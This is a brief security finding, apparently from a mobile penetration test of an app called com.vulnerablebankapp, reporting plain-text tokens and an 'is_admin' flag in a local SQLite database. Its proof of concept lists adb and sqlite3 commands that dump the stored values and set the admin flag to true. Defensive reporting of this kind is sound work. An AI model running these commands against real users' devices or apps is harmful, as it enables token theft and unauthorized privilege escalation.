Findings:
1. Insecure Data Storage (M2)
Description: Sensitive data, including authentication tokens and authorization flags like is_admin, were found stored in plain text within a local SQLite database.

Impact: Local attackers with access to the device can manipulate the SQLite database and gain unauthorized privileges.

Proof Of Concept (PoC) 
adb shell
cd /data/data/com.vulnerablebankapp/databases/
sqlite3 catalystLocalStorage
> SELECT * FROM catalystLocalStorage;
> UPDATE catalystLocalStorage SET value='true' WHERE key='is_admin'

Recommendation:
Avoid storing authorization flags on the client side.
Store all sensitive data securely using encrypted storage or server-side validation.